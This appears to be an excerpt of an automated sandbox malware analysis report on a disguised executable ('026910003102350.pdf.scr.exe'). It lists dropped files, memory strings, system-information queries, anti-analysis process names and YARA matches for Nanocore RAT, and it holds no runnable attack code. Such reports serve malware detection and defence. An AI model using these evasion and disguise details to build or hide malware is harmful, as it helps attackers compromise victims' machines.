Source: itugx.exe, 00000005.00000003.451151702.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.462582507.00000000013BF000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.505411546.00000000012AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: inGetText("Program Manager") = "0" Then
Source: rnnsh.xls.0.dr	Binary or memory string: If WinGetText("Program Manager") = "0" Then
Source: RegSvcs.exe, 00000003.00000002.580107208.00000000038EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager\2
Source: itugx.exe, 00000017.00000003.535781769.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.534401259.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.539266088.0000000000CD3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager*;
Source: itugx.exe, 00000005.00000003.410793804.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If WinGetText("Program Manager") = "0" Then$
Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003802000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerD$Fp

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_00CDAF0F

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

Code function: 0_2_00CDF654 cpuid

0_2_00CDF654

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

Code function: 0_2_00CDDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_00CDDF1E

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Code function: 2_2_0034BCF2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

2_2_0034BCF2

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Code function: 2_2_0036E5F8 GetUserNameW,

2_2_0036E5F8

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

Code function: 0_2_00CCB146 GetVersionExW,

0_2_00CCB146

AV process strings found (often used to terminate AV products)

Source: itugx.exe, 00000002.00000003.400023583.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.399006405.0000000000E96000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412932307.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.396010910.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.400917680.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451422910.0000000001568000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000002.455510913.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451597738.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.467505109.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000002.470674080.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.466572234.0000000001469000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: procexp.exe
Source: itugx.exe, 00000002.00000003.400023583.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.399006405.0000000000E96000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412932307.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.396010910.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.400917680.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451422910.0000000001568000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000002.455510913.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451597738.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.467505109.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000002.470674080.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.466572234.0000000001469000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: regshot.exe

Stealing of Sensitive Information

Yara detected Nanocore RAT

Source: Yara match	File source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR

OS version to string mapping found (often used in BOTs)

Source: itugx.exe	Binary or memory string: WIN_81
Source: itugx.exe	Binary or memory string: WIN_XP
